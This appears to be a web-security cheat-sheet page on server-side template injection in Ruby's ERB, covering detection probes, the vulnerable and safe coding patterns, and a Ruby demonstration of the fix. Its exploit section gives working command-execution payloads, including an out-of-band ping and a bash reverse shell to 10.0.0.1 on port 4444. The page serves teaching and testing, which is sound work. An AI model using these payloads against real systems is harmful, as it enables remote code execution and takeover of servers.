ERB SSTI

Last modified: 2024-04-13

Web

ERB (Embedded Ruby, the template engine that ships with Ruby and underlies Rails views) is vulnerable to server-side template injection when user input is concatenated into the template source before it is compiled, e.g. ERB.new("Hello " + params[:name]).result. Input that is passed to a fixed template as data is not affected; the injection point is the template string itself.

Payloads

Try the following payloads in the URL path, query and form parameters, headers, and any other input that is reflected in a page. If <%= 7*7 %> comes back as 49, the input is being compiled as ERB; if it comes back verbatim (or HTML-escaped), it is being treated as data.

<%= 7*7 %>
<%= user.username %>
<%= system("whoami"); %>

The second payload assumes a user object exists in the template's binding, so adapt it to the application. Note that system("whoami") returns true or false and sends the command's output to the server process's stdout, so the response shows only true; backticks (`whoami`) or IO.popen return the output as a string, which is what you want reflected in the response.

Exploit

If the arithmetic probe is evaluated (49 appears in the response), the input is compiled as Ruby and we can run arbitrary commands in the context of the web server process:

# Out-of-band check (listen with tcpdump or a packet capture on 10.0.0.1)
<%= system("ping -c 1 10.0.0.1"); %>

# Reverse Shell
# system() runs a string containing shell metacharacters through /bin/sh, which on
# Debian-based systems is dash and does not understand >& or /dev/tcp, so wrap the
# one-liner in bash -c
<%= system("bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"); %>
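The pattern behind these payloads and the corresponding fix, as an added Ruby example (not code from the original page): render_vulnerable splices input into the template source the way a vulnerable application does, render_safe hands the same input to a fixed template as data via result_with_hash, and ssti_evaluated? is a hypothetical probe helper that sends the arithmetic test and checks the response. The greeting template and the probe values are constructed for the example.

```ruby
require "erb"

# Vulnerable pattern: attacker-controlled text is spliced into the template
# SOURCE, so any <%= ... %> tag inside it is compiled and evaluated as Ruby in
# the server process. This is the bug the payloads above detect.
def render_vulnerable(user_input)
  template = "Hello, #{user_input}!"
  ERB.new(template).result(binding)
end

# Safe pattern: the template is a constant written by the developer and the
# user input is handed to it as DATA via result_with_hash. ERB tags inside the
# input are never parsed because the template source never changes.
# html_escape is unrelated to SSTI but stops reflected XSS at the same spot.
SAFE_TEMPLATE = ERB.new("Hello, <%= ERB::Util.html_escape(name) %>!")

def render_safe(user_input)
  SAFE_TEMPLATE.result_with_hash(name: user_input)
end

# Detection probe (hypothetical helper): submit an arithmetic expression and
# check whether the product appears verbatim. A non-trivial product avoids
# false positives from pages that happen to contain "49". `render` is any
# callable that takes the injected string and returns the response body.
PROBE_A = 1337
PROBE_B = 7

def ssti_evaluated?(render)
  body = render.call("<%= #{PROBE_A}*#{PROBE_B} %>")
  body.include?((PROBE_A * PROBE_B).to_s) && !body.include?("<%=")
end

if __FILE__ == $PROGRAM_NAME
  puts render_vulnerable("<%= 7*7 %>")              # Hello, 49!
  puts render_safe("<%= 7*7 %>")                    # Hello, &lt;%= 7*7 %&gt;!
  puts ssti_evaluated?(method(:render_vulnerable))  # true
  puts ssti_evaluated?(method(:render_safe))        # false
  # system() returns true/false and prints to the server's stdout; backticks
  # return the output, which is what you want reflected in the response.
  puts render_vulnerable("<%= system(\"echo hi\") %>")  # prints hi, then Hello, true!
  puts render_vulnerable("<%= `echo hi`.strip %>")      # Hello, hi!
end
```

The fix is not escaping: result_with_hash works because the template string never contains attacker data, so nothing the attacker sends is ever compiled. The same applies to Rails: render inline: params[:x] is the vulnerable shape, render plain: params[:x] or a fixed view with the value passed as a local is the safe one.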